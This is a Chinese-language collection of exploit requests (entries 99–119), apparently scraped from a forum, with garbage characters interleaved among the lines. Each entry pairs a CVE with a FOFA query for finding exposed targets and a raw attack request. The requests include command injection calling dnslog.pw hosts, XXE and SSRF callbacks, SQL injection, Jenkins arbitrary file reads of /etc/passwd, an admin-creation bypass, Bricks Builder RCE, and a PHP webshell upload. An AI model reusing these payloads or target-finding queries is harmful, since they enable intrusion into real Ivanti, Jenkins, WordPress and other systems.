Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# g/ U c& R( f% V9 w; ?Content-Type: application/x-www-form-urlencoded; charset=UTF-8$ ] @. M& T+ I" k7 k! K
X-Requested-With: XMLHttpRequest' n2 b+ o. k" T8 }6 u
. Q& c+ g) T/ z9 e3 ]
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
4 i6 w$ A8 i' {, ?1 _1 s% r/ s% b5 F7 {0 d$ ~! B
9 k/ j& X9 u* h4 C* C) c99. Ncast盈可视高清智能录播系统busiFacade RCE
/ r% {& m5 O8 F8 [CVE-2024-03050 R; ~ w7 m" p: T' l% J$ M: M: z3 B
FOFA:app="Ncast-产品" && title=="高清智能录播系统"6 M: Z! ]( ~$ }' m
POST /classes/common/busiFacade.php HTTP/1.1
( R# o% o2 K& R+ n& kHost: 192.168.40.130:8080* ~& m' ]! }; V3 F4 F) M4 n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.02 [" W+ N4 S* P+ s; I
Connection: close. w! X! I9 y' r/ e
Content-Length: 154
! r8 U% m- [5 |6 m3 gAccept: */*
4 k/ W$ j" {5 s( WAccept-Encoding: gzip, deflate3 [" g$ G* b+ R! {) g/ c6 }
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% z# v# B. L6 n! G& @Content-Type: application/x-www-form-urlencoded; charset=UTF-8
7 u4 g; d6 u" N/ ~4 {X-Requested-With: XMLHttpRequest
* _( w8 H8 G# z6 O/ G
6 ]" D5 `: H' K3 t%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D2 P& m9 _' z: }! ?" E; |
0 K, i# E( N' p9 V
' f# V9 Y5 A& _# ?100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传: s1 i$ r/ L, K
CVE-2024-0352
! [- K1 q6 Y6 dFOFA:icon_hash="874152924"0 F$ c( \3 K/ Z+ K' w( \; F
POST /api/file/formimage HTTP/1.1& v$ [) J6 m$ v0 l/ t
Host: 192.168.40.130 A5 a, f, m( _3 z0 b
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
8 k" X6 r' L9 zConnection: close
6 ?% s; a% P0 V7 T' ?Content-Length: 201
" B' S! q0 k) ~; Z GContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei2 k$ R2 w1 D+ V& p# M# F
Accept-Encoding: gzip7 I! I* i- J: Y- M
; O; _' ` q8 O4 U: H. e9 p# h------WebKitFormBoundarygcflwtei
5 }- O+ U9 f+ v: n5 g/ UContent-Disposition: form-data; name="file";filename="IE4MGP.php"8 q( {/ q- r. G: h% l) E
Content-Type: application/x-php
' l g$ N/ @! \9 {: w* U7 }/ n) E7 N
2ayyhRXiAsKXL8olvF5s4qqyI2O: R$ M' n, G5 I0 f8 W
------WebKitFormBoundarygcflwtei--
: j! Z5 O7 ]2 ?. V1 h$ y6 |% u( e! Z8 Y
- h* f, U5 G' p8 x; c* C5 R101. ivanti policy secure-22.6命令注入
0 H9 u8 `8 c) \$ R. L; v6 bCVE-2024-218874 L! w9 I5 o6 ], {
FOFA:body="welcome.cgi?p=logo", x4 s1 N+ K0 a6 I+ t1 p
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1( q r1 V2 `' A. U
Host: x.x.x.xx.x.x.x
* m: j8 F7 V" eUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
; \" d3 S% B+ P( b- Z) H% T# F! n4 aConnection: close2 ^) H* N N0 {( H. t
Accept-Encoding: gzip
* q) x+ B' W7 P' d; L- r( S" Q' B! B2 r
5 b4 _7 _; a, }" ?+ b102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
' I$ |, ^) ]0 e* E, A8 D. X2 UCVE-2024-218935 u* V4 B0 @4 K3 a9 y. I7 H6 U
FOFA:body="welcome.cgi?p=logo"
- D- @4 o* y* kPOST /dana-ws/saml20.ws HTTP/1.19 p3 J8 _/ l# C4 j! q9 ]
Host: x.x.x.x( F7 G* B; S6 V2 _3 O/ c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36; T. r4 ~* C/ W
Connection: close! Y3 h8 o# n/ h1 R5 s# p8 p$ J' e
Content-Length: 792
4 b9 Q2 z6 J# T fAccept-Encoding: gzip3 L x9 u. t3 ?
+ K$ @$ N6 A: e* Q5 A<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>, y$ s. s7 \+ S/ B
+ P9 [3 r( D7 f0 Z# v, }; e
103. Ivanti Pulse Connect Secure VPN XXE
) w, A; \' e- n, C5 M5 BCVE-2024-22024
9 n9 s5 P6 n' x7 B5 Y; }, rFOFA:body="welcome.cgi?p=logo"
4 g3 F+ f# D5 Y. J: y ~+ X q2 VPOST /dana-na/auth/saml-sso.cgi HTTP/1.1$ Q1 b" |/ Q+ h$ P: ~. n+ u
Host: 192.168.40.130:1111 \1 g1 v# N; l: K |9 ?9 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36' ]+ ^% u4 a/ h6 }3 b/ c5 U, _
Connection: close S( A/ @1 q1 D4 \6 E
Content-Length: 204' t8 ^' ^1 Z3 P2 {9 L% ?( V, W
Content-Type: application/x-www-form-urlencoded9 b& D; P: }* s. C% D2 w7 f3 T
Accept-Encoding: gzip; v7 o' W/ T7 R8 M
) _' K" H4 U Y* R$ l. f0 y
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
7 {8 N' y) K0 ~; y) j+ i
; D0 B+ y3 f0 v g x" ]8 |# }- W) _+ C% b
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
7 R) n S: f* ]' O! A# g: U<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
$ |4 p! B7 N3 F R, l. i7 T" D9 B+ p2 F. }) ~
6 S# A$ w' A) s" O104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露( {. k# i; b% k! x/ z
CVE-2024-0569
1 |8 i; B' f! MFOFA:title="TOTOLINK"/ ]6 Z% {3 k/ T7 @! M% I( ^1 H$ g
POST /cgi-bin/cstecgi.cgi HTTP/1.1, `. g" K. O- _! l, I9 [- q# L0 j
Host:192.168.0.10 Z9 g U+ v9 X% A; U/ }# O6 ~
Content-Length:411 v% ]; K+ m) s0 G
Accept:application/json,text/javascript,*/*;q=0.01+ k- {; U8 V+ \& i% B
X-Requested-with: XMLHttpRequest- c- l/ ^0 ]5 q
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.368 d1 q4 C8 v7 k" E2 l4 k
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
* A) _& u9 ^6 q+ i6 q( dOrigin: http://192.168.0.1
" B6 K( P8 x* b$ k6 D7 Q' j9 ~Referer: http://192.168.0.1/advance/index.html?time=1671152380564
$ Q6 ~9 \* l" }1 P: d3 H' [Accept-Encoding:gzip,deflate
. i2 @* l* T, n7 ]0 hAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
2 {0 |" @5 d: i" O( `Connection:close
# v8 p0 [3 [- e- A+ a/ i; ~% H; A& g( D$ m+ a* A
{
+ c _2 p3 s8 H% [( ]! q"topicurl":"getSysStatusCfg",6 X) ^! F8 z9 [. X
"token":""6 x. C, g* C6 j, ^3 ~
}% I! f1 L+ r; k# ~' v4 {( O
9 t, B% P: }( g% E
105. SpringBlade v3.2.0 export-user SQL 注入
- O; o& O$ c! R% f5 h) lFOFA:body="https://bladex.vip"
R; }; e) t8 Q8 Uhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1/ S- t& R% o: r
6 l' ]8 t5 v6 H5 ]2 k. w' `106. SpringBlade dict-biz/list SQL 注入
$ W& s z( O4 E7 a; l. u0 oFOFA:body="Saber 将不能正常工作"& i- q. ^* x$ b2 a" V/ s. U4 e5 X% Z
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
. G( U& D, F3 o+ B; QHost: your-ip
, n3 b8 e. c8 m' dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 `) J& `5 }. ^0 a' y0 S7 KBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
5 n7 e( P6 J7 j' w0 ZAccept-Encoding: gzip, deflate$ W& W! {9 [9 F' J4 k3 S
Accept-Language: zh-CN,zh;q=0.92 ^) P! f: A3 s& _- Q4 i- D
Connection: close
2 l+ d0 Z' w, H1 \' c8 h4 `8 @$ W1 [1 `, u
9 t R& w% I( `# M4 Q8 r
107. SpringBlade tenant/list SQL 注入3 w: g$ \& L; E$ g; o( L y
FOFA:body="https://bladex.vip"# m" c$ ?; I8 [/ }& l5 i/ c l
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
$ Y' T- i6 ^$ f; X+ E# G( }9 D" `Host: your-ip% j* p! `2 d; y; q: g# V: J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36, B- P$ ]+ S0 D" M
Blade-Auth:替换为自己的! z; t. v+ ~' s7 x$ r/ _! |
Connection: close
1 I% f4 r4 a4 Y4 T* E R* i/ o2 T5 ]7 j' n' k0 C0 `* ?
1 E% s5 \ r) v. x
108. D-Tale 3.9.0 SSRF$ }: S! `$ ^! h; K& A, g) t
CVE-2024-21642
4 k0 q ~' `9 i% g- h- eFOFA:"dtale/static/images/favicon.png"
7 Q1 a+ g8 Q1 T; H4 O( TGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
5 R: ^! L; ^9 {, eHost: your-ip7 o! ?: b) B: q, B( S$ Z
Accept: application/json, text/plain, */*
* n2 s9 Q* m7 f0 y. pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36' z. E6 H5 N0 ]" `6 p
Accept-Encoding: gzip, deflate
1 T4 z. m" x/ k8 y7 D7 UAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
8 }& L6 q+ O, w# VConnection: close
% q4 U9 B6 M4 A2 k4 E ]9 W) r$ o
( K: X+ I8 i+ K# H8 G, Y6 z, E- p, H- r# t' \' U% U8 k' B
109. Jenkins CLI 任意文件读取
, [( j$ h- Y+ p6 ECVE-2024-23897, l: Q- ]% t$ A" Y: `& n
FOFA:header="X-Jenkins"' y) x6 N5 _, a- {
POST /cli?remoting=false HTTP/1.19 F2 t: y0 f% A+ f' _1 P
Host:8 _$ q( }! M6 m
Content-type: application/octet-stream
. H/ v* x5 q4 VSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92$ N" p; l9 A" g% S
Side: upload
" {' V' r1 x3 x9 q% i8 W: t. H* ~$ tConnection: keep-alive. P- Q7 Q7 Z4 l" Z5 N- j
Content-Length: 163
* f c* `4 i7 L. T$ I2 K/ i k0 A6 I& Q- A
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
' Z2 p; [( ]" Q4 t- @
6 i& Z0 H( \5 k3 H" B
/ Y- w/ f, Q' l$ c1 n' N- G" [POST /cli?remoting=false HTTP/1.1
. m7 C5 m4 e3 L4 V @: p" BHost:
8 t* Y& F5 b+ c, ~Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
' P( I) K% q9 k. M9 T4 T' m, @download! V' i0 z' w6 u$ J
Content-Type: application/x-www-form-urlencoded
5 V: H7 i: p& h+ }5 e# oContent-Length: 0
4 h6 t: e% Q$ v/ W
/ X G3 ^/ W0 H3 A J( _3 A7 o1 ~1 G. @# e$ x8 \) N) m+ f
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin- D9 v3 l+ J& v5 e" H2 p' _% O# G
java -jar jenkins-cli.jar help
; r1 g, f( W t) a[COMMAND]# z( W+ A M! z/ t5 R8 u' Y
Lists all the available commands or a detailed description of single command.
6 V2 ?' d, W1 z8 q COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
/ S' @: q4 F" R; f+ i
a& ~+ i: A) I; l
1 e: Q8 `# {3 @110. Goanywhere MFT 未授权创建管理员
+ Q0 ~' b% D- l0 y7 x- O5 lCVE-2024-0204
6 r! H! r! k g rFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"5 b# v9 m5 f1 U
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
6 b# j) ~8 G" [8 KHost: 192.168.40.130:8000
! [! d4 v; p. w) H- ]. l/ VUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.361 }% l' p1 @! C2 @5 z
Connection: close" J D7 [$ b5 G Q
Accept: */*
" g/ Q9 |; {: yAccept-Language: en
. @8 Z8 Q8 O4 ?% b) RAccept-Encoding: gzip+ J6 C! C& h {7 R0 }; K
0 a! H( g7 n2 A/ x! J$ x% S4 J. x4 ?$ u* L. t r; ?4 Y/ n
111. WordPress Plugin HTML5 Video Player SQL注入
* T1 t e2 U) e! l# ?CVE-2024-1061+ v# t& [+ Z f3 ~8 T
FOFA:"wordpress" && body="html5-video-player"! I" m5 c& E) S5 u
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" D' D& O1 M' g( z
Host: 192.168.40.130:1121 N- `! q! @6 G, N$ J8 H
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
, G2 H7 f: h% r0 b# {+ g6 pConnection: close
u) r) W* Z0 [# {4 M( VAccept: */*
" s; V6 P4 O- q3 _! |6 E# o& I& wAccept-Language: en" q' [3 g' p( I7 O1 ?+ H5 q
Accept-Encoding: gzip
) u0 q/ y: A. n$ Y2 Y2 Z" ~8 F' q5 k1 W& R2 W8 {& b/ S+ d$ z
7 _& ^ E) D2 _
112. WordPress Plugin NotificationX SQL 注入2 J) I$ h+ }( n. j9 ~1 u+ r
CVE-2024-1698' r, Y/ U; ]3 T8 u
FOFA:body="/wp-content/plugins/notificationx"
s% P6 J( v+ A6 h2 Q8 z. _POST /wp-json/notificationx/v1/analytics HTTP/1.1
" t$ e" w1 I9 B$ F# Y! i" Q1 k5 QHost: {{Hostname}}
. i' b) h' {5 L3 ^Content-Type: application/json
6 B5 o7 T) o5 p% N& d; d. P: K8 P& |4 A8 F5 e" X% W
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}# u% f5 M: h5 d) N& F$ n6 S: A
9 H3 A( q/ q* l& T% H1 Z- m$ F+ F7 ]- \% S3 X
113. WordPress Automatic 插件任意文件下载和SSRF
, e/ Q! z1 n6 \ c# [8 q7 gCVE-2024-279547 e' o# p8 Z% I! L5 p! j3 W, y
FOFA:"/wp-content/plugins/wp-automatic"
0 u* u; n; l! p6 V1 k) n t2 VGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
s& l P- Y$ V8 FHost: x.x.x.x" U5 W& h- Z; q- R+ d) P+ J9 {
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36/ U! J+ ]( ?. g( b2 v8 ]/ H1 ^
Connection: close
}# B& n$ V# B5 aAccept: */*: D' L4 W& {3 ?1 P4 P
Accept-Language: en
, W" W4 r7 K) v2 f2 ^Accept-Encoding: gzip
- G* }- L4 D9 w
# d- z& S2 O6 r# @; i& E4 `( E: d
' B& S& r& X5 H% e( {" b1 a114. WordPress MasterStudy LMS插件 SQL注入
; n7 F3 O3 v+ e7 NFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
- [0 Z: P1 c$ ZGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1$ b) K+ N0 \8 t# X# D- N2 G8 G
Host: your-ip% t1 k, d" k% m2 Z
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36, H$ R$ B- l. G8 x6 c" E
Accept-Charset: utf-8) v" x! d, Y* O' A S4 I* r
Accept-Encoding: gzip, deflate# O$ V0 ]( h, C* R9 Y
Connection: close4 G! v; G7 d' R, f1 X- b0 w; D
3 C" F( }& {4 L& t: |* O
9 y& J( q3 k: |
115. WordPress Bricks Builder <= 1.9.6 RCE
0 c( W. n* s2 l, _1 L7 M: PCVE-2024-25600
0 m' f: x3 {+ ^2 lFOFA: body="/wp-content/themes/bricks/"
( k6 m+ `2 U* z3 b m第一步,获取网站的nonce值 S0 ?9 \6 k. T
GET / HTTP/1.19 H+ ^0 E( p9 x! I0 _. T
Host: x.x.x.x
3 w* P$ c( i8 Q0 y4 C# n$ Y$ Y& n0 ^User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36( G# L$ @: p/ t1 b$ T$ V) w
Connection: close2 }+ g0 {6 Y) }) B* v* q9 A
Accept-Encoding: gzip
& L6 H, _- x% f# \# c
) w) r' g8 T+ y3 N
$ M$ Z* @' K F; P1 ^! g& K+ l第二步替换nonce值,执行命令7 L, x+ G" _( j# J8 Z
POST /wp-json/bricks/v1/render_element HTTP/1.1
% F- R9 T9 [! u7 YHost: x.x.x.x2 t1 a* B; Y# z/ {; {7 K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.368 x d1 u( F( o+ V1 \
Connection: close* W; b# S4 _9 p7 h" z- b
Content-Length: 356: G; Q) J: k) \; h! U2 c) t
Content-Type: application/json
) k/ o& ^* J& H' F: v' cAccept-Encoding: gzip6 u2 W+ _2 s+ ] K! P+ L
9 n: u. C4 k! e Y
{" @& ? q/ r3 @- t+ g
"postId": "1",7 C% o: i5 p- W8 O% t# A" ]' s- f
"nonce": "第一步获得的值",
: ^- W) m* D3 t% h5 X "element": {! e5 l: f; {$ A; Q9 n& h! p
"name": "container",3 |" ^) l- H' F. H
"settings": {' j- H+ W y9 D8 C1 e
"hasLoop": "true",. A& @) x0 h1 z* \- I) d
"query": {
: {, X. ^% f7 m: j "useQueryEditor": true,4 _6 {# v/ s' _ B' Y: P; B4 `
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
) S; z; a I# p& ^- E1 V- o "objectType": "post"$ i& K. W& f5 I* I' l! x# J
}
3 v. N+ s) K* [5 e }
# ^ Y. e6 s: \8 q }/ f. ]* `! o3 S6 U1 i$ W
}: o, m& Z9 o4 E+ c7 ~4 h* `
# K7 H! H% O+ v! U5 }; M, E+ o# v
116. wordpress js-support-ticket文件上传7 r6 F$ l$ H2 v1 U
FOFA:body="wp-content/plugins/js-support-ticket"# [% w9 e9 B4 _
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
) \% G4 e; X$ e) _. a) w' Y) {Host:* U3 @7 x) T$ s
Content-Type: multipart/form-data; boundary=--------767099171
' N. w9 ]" P: R. J! |7 PUser-Agent: Mozilla/5.0$ T, B' \9 x: ?& A& ?# E
, C! N" M( @" v: ~+ E, y) |----------767099171) h& |5 D/ d; q! \- D9 U
Content-Disposition: form-data; name="action"# \# N2 g, b4 C8 c0 b+ z
configuration_saveconfiguration
; M3 n* Z! s: [8 k2 }----------7670991713 b1 x8 |- L: f. M) ^; b2 ?
Content-Disposition: form-data; name="form_request": d8 l: a) f2 U8 @
jssupportticket
9 v; o% t+ n( {" s. |----------7670991716 _1 W: a- I% V$ }) k3 T$ y5 ?
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"( X. J# T# e/ E; O* X. z2 v
Content-Type: image/png
; ?" s3 [* T0 m4 m$ E----------767099171--
2 P) I& l4 {9 _+ a) I2 y; u$ x% L1 O2 F+ ~& F
7 l; |, M" f. c9 x& T& }117. WordPress LayerSlider插件SQL注入9 [6 Z# J0 f# d0 ]/ y5 i3 ^
version:7.9.11 – 7.10.0- P P, ^/ w) }6 k- R6 }
FOFA:body="/wp-content/plugins/LayerSlider/"; _; Q N% x N) D% s- r& M. J9 K ]
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
" @2 u* ]2 C# c- L. eHost: your-ip
! O; Z# R* h; r/ |* ?- R/ O8 m/ @ ?" pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
6 e2 ]9 u$ W, A u# mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 a: d4 P# O- L7 L4 R. f) sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, m& e9 z/ h5 r( e; D$ h- i/ Y
Accept-Encoding: gzip, deflate, br
" W3 n/ x7 x: wConnection: close
( v* r5 Z. P8 H* OUpgrade-Insecure-Requests: 1
" a* O+ N8 [8 H1 E4 N) Q! T8 p
; m2 t3 @! g1 l P2 J- v8 r- ^1 A6 ^, M
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
: b( A4 ~- J ]CVE-2024-0939, _ f1 Z& G% o2 W3 @" C
FOFA:title="Smart管理平台"
! f1 {( [: K# l! SPOST /Tool/uploadfile.php? HTTP/1.1# w! l6 O1 ^- w1 B% z. ?& P
Host: 192.168.40.130:8443* F6 g- e9 d0 U, G5 r
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8: c9 J( m0 P: b" s9 e+ a% F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
: B. R* t! h& t4 Q0 A9 TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- ]8 t5 A( S5 e3 r
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 l3 Y3 O: ~9 c
Accept-Encoding: gzip, deflate4 R: d$ b5 g% B) {- l. j. A) q+ k
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
X; n! D3 m& B) M& I+ pContent-Length: 4053 p Y" E, F. l% ], J
Origin: https://192.168.40.130:8443- l1 w* d: S Z3 v
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
- v7 E9 o% z8 S8 I9 @3 Y6 a: d. H! {Upgrade-Insecure-Requests: 1
7 |+ ?* s! ~ JSec-Fetch-Dest: document
- q9 [$ F* q# h' o4 b; \* G. ESec-Fetch-Mode: navigate
% `/ C- Q8 s6 H9 C8 eSec-Fetch-Site: same-origin6 v _ O7 t' t! k& b
Sec-Fetch-User: ?1
+ n% x- M D/ yTe: trailers
2 ]! s3 m- N% ~Connection: close
! h7 h7 N/ b4 m ?4 \8 l" j
) n" Y" P1 D5 G' r2 g; c# @-----------------------------13979701222747646634037182887& u1 A0 r$ ^% f7 F+ A% W, b
Content-Disposition: form-data; name="file_upload"; filename="contents.php"' E4 w$ C( a, I; C5 O5 N
Content-Type: application/octet-stream
& F2 j8 [2 B& ~* ~8 \: X; F; ] Z& @$ Z5 S' n" m" Y
<?php4 ]" r2 U$ |& |8 f5 U
system($_POST["passwd"]);
5 f. N3 k A. u?>/ _ G; x. x, U6 q: b! L, t6 ~
-----------------------------13979701222747646634037182887
, K) V- N, E$ K qContent-Disposition: form-data; name="txt_path"
! x3 f6 L( I6 z! q+ n; U% ~5 ~+ C
' x6 r6 n" k- T/ t. A/home/src.php( ?" V# u( g: s0 I. m ]/ X1 |
-----------------------------13979701222747646634037182887--
% K4 x( S- t1 m9 }: ^3 x
& _! R0 j( h; Z( b( k5 k4 s0 f1 m$ c
访问/home/src.php0 |# I1 O r9 U6 W6 t4 W
3 n+ Q5 q. _, R/ D$ M" @* P119. 北京百绰智能S20后台sysmanageajax.php sql注入- [7 b: \. a" H {
CVE-2024-1254* h; }$ D& t+ L7 K6 y9 _" G
FOFA:title="Smart管理平台"- C; _7 h9 S1 z/ z, k- s. {
先登录进入系统,默认账号密码为admin/admin! _4 v8 |' h6 r7 n3 [
POST /sysmanage/sysmanageajax.php HTTP/1.11$ n* I0 u5 e7 y' F( j$ r
Host: x.x.x.x0 `9 i* o0 L; F4 W/ }& v
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
/ @5 Y! Z! x* k/ s2 d/ x4 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0: p% g6 t6 I3 d) G( @
Accept: */*
! ~1 g. Q5 U dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 I# e% A$ {$ S
Accept-Encoding: gzip, deflate
8 a+ p6 t! h3 [: X, pContent-Type: application/x-www-form-urlencoded;6 P, |4 B: K/ u! R f
Content-Length: 109
+ ^" J/ g- }: h. A, k1 ~/ @Origin: https://58.18.133.60:8443
8 T- j) s% _6 N' c/ NReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
8 _: Y' T2 z }) l4 u: ?Sec-Fetch-Dest: empty
. ~( e7 U' b! s9 X mSec-Fetch-Mode: cors7 |1 V3 Z3 j( f% t5 ~8 W2 f" h
Sec-Fetch-Site: same-origin
3 E1 h8 R# K- W7 @; o. S. mX-Forwarded-For: 1.1.1.1
" Y! s* i+ S9 c( Q& i: x5 b0 fX-Originating-Ip: 1.1.1.1: j) ~, J* b9 d9 J5 p
X-Remote-Ip: 1.1.1.12 [# |# v3 T# h! U- ]6 o
X-Remote-Addr: 1.1.1.1: Y0 W' d% d( M5 ?
Te: trailers
% A$ x% x9 W1 Y1 {6 E8 {# fConnection: close) v1 \( i1 F C. [! x h
0 R& `( V2 D% L7 |: ?
